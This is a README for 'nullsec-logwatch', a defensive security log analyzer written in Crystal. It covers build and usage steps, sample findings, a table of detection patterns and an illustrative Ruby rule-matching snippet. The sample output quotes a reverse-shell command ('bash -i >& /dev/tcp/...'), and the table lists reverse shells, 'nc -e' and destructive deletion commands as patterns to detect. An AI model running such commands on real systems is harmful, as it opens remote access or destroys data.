nullsec-logwatch v1.0.0

Security log analyzer written in Crystal - pattern matching with static types

📋 NullSec LogWatch

Security Log Analyzer

Ruby-like elegance with static type safety


🎯 Overview

NullSec LogWatch is a security log analyzer written in Crystal. It scans log files for suspicious patterns including authentication failures, brute force attacks, malware indicators, and system anomalies.

✨ Features

  • 📋 Log Analysis - Parse and analyze security logs
  • 🔍 Pattern Matching - 20+ threat patterns
  • 🎯 Severity Classification - Critical/High/Medium/Low
  • 📊 Statistics - Summary of findings
  • 📤 JSON Export - Machine-readable output

🛡️ Security Features

┌─────────────────────────────────────────────┐
│        NullSec LogWatch v2.0.0             │
├─────────────────────────────────────────────┤
│  ✓ Strong Static Typing                    │
│  ✓ Null Safety (Nil unions)                │
│  ✓ Bounds-checked Arrays                   │
│  ✓ Memory Safety via GC                    │
│  ✓ Immutable Strings                       │
│  ✓ Result Types for Errors                 │
└─────────────────────────────────────────────┘

📦 Installation

# Clone the repository
git clone https://github.com/bad-antics/nullsec-logwatch.git
cd nullsec-logwatch

# Build with Crystal
shards build --release

# Or compile directly
crystal build --release -o nullsec-logwatch logwatch.cr

Requirements

  • Crystal 1.0 or later

🚀 Usage

# Analyze a log file
./nullsec-logwatch /var/log/auth.log

# Show all findings
./nullsec-logwatch --all /var/log/syslog

# JSON output
./nullsec-logwatch --json /var/log/messages

# Show help
./nullsec-logwatch --help

📊 Output Example

██╗      ██████╗  ██████╗ ██╗    ██╗ █████╗ ████████╗ ██████╗██╗  ██╗
██║     ██╔═══██╗██╔════╝ ██║    ██║██╔══██╗╚══██╔══╝██╔════╝██║  ██║
██║     ██║   ██║██║  ███╗██║ █╗ ██║███████║   ██║   ██║     ███████║
██║     ██║   ██║██║   ██║██║███╗██║██╔══██║   ██║   ██║     ██╔══██║
███████╗╚██████╔╝╚██████╔╝╚███╔███╔╝██║  ██║   ██║   ╚██████╗██║  ██║
╚══════╝ ╚═════╝  ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═╝   ╚═╝    ╚═════╝╚═╝  ╚═╝
               bad-antics • Security Log Analyzer

[*] Analyzing: /var/log/auth.log

[*] Analysis Statistics
  Total Findings:  47
  Critical:        3
  High:            12
  Medium:          18
  Low:             14

[*] Security Findings
  [Critical] Line 1847: Brute Force
    Jan 22 14:32:15 - repeated login failures from 192.168.1.100...

  [Critical] Line 2103: Shell Activity
    Jan 22 15:45:22 - bash -i >& /dev/tcp/10.0.0.5/4444...

  [High] Line 892: Auth Failure
    Jan 22 10:15:33 - Failed password for invalid user admin...

[✗] Critical security events detected!

🔍 Detection Patterns

Category          Severity  Patterns
----------------  --------  ----------------------------------
Brute Force       Critical  Repeated failures, account lockout
Shell Activity    Critical  Reverse shell, bind shell, nc -e
Malware           Critical  Cryptominer, ransomware, backdoor
Auth Failure      High      Failed password, invalid user
Port Scan         High      nmap, masscan indicators
System Crash      High      Kernel panic, segfault
Privilege Change  Medium    sudo, su, setuid
File Deletion     Medium    rm -rf, shred
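
An added example (Ruby, not the project's Crystal source) of how rules like three rows of the table above can yield per-line findings and the severity counts shown in the output example. The regexes, the threshold of 3, the helper names and the sample log lines are assumptions constructed for illustration; Brute Force is derived here by counting Auth Failure lines per source IP.

```ruby
# Added illustration in Ruby; NOT the nullsec-logwatch source (which is Crystal).
# Regexes are assumed stand-ins for three rows of the Detection Patterns table.
RULES = [
  { category: "Auth Failure",     severity: :high,   re: /Failed password|invalid user/i },
  { category: "System Crash",     severity: :high,   re: /kernel panic|segfault/i },
  { category: "Privilege Change", severity: :medium, re: /\bsudo:|\bsu:|setuid/ },
].freeze

BRUTE_FORCE_THRESHOLD = 3 # assumed: failures from one source IP before escalating
Finding = Struct.new(:line_no, :category, :severity, :text)

# Returns findings in file order; the first matching rule wins for each line.
def scan(lines, threshold: BRUTE_FORCE_THRESHOLD)
  findings = []
  failures = Hash.new(0) # source IP => failed-login count so far
  lines.each.with_index(1) do |line, line_no|
    rule = RULES.find { |r| r[:re].match?(line) }
    next unless rule
    findings << Finding.new(line_no, rule[:category], rule[:severity], line.strip)
    next unless rule[:category] == "Auth Failure"
    ip = line[/from (\d{1,3}(?:\.\d{1,3}){3})/, 1]
    next unless ip
    failures[ip] += 1
    # Escalate exactly once, on the line where the count reaches the threshold.
    if failures[ip] == threshold
      findings << Finding.new(line_no, "Brute Force", :critical,
                              "#{threshold} login failures from #{ip}")
    end
  end
  findings
end

# Severity => count, the shape of the "Analysis Statistics" summary.
def stats(findings)
  findings.group_by(&:severity).transform_values(&:size)
end

# Constructed sample in auth.log/syslog style (not real log data).
SAMPLE = <<~LOG.lines
  Jan 22 10:15:33 host sshd[811]: Failed password for invalid user admin from 192.168.1.100 port 50122 ssh2
  Jan 22 10:15:35 host sshd[811]: Failed password for invalid user admin from 192.168.1.100 port 50124 ssh2
  Jan 22 10:15:36 host sshd[812]: Accepted publickey for deploy from 10.0.0.7 port 40022 ssh2
  Jan 22 10:15:38 host sshd[811]: Failed password for root from 192.168.1.100 port 50130 ssh2
  Jan 22 10:20:01 host sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
  Jan 22 10:21:47 host kernel: worker[2211]: segfault at 0 error 4 in worker
LOG

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE).each { |f| puts "[#{f.severity.to_s.capitalize}] Line #{f.line_no}: #{f.category}\n    #{f.text}" }
  p stats(scan(SAMPLE))
end
```

A single-line rule cannot express "repeated failures", which is why the Critical finding comes from state kept across lines rather than from a regex of its own.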

📜 License

NullSec Proprietary License

👤 Author

bad-antics


Part of the NullSec Security Framework

Repository

nullsec-logwatch

  • January 22, 2026
Synced at

Thu, 22 Jan 2026 16:59:11 GMT
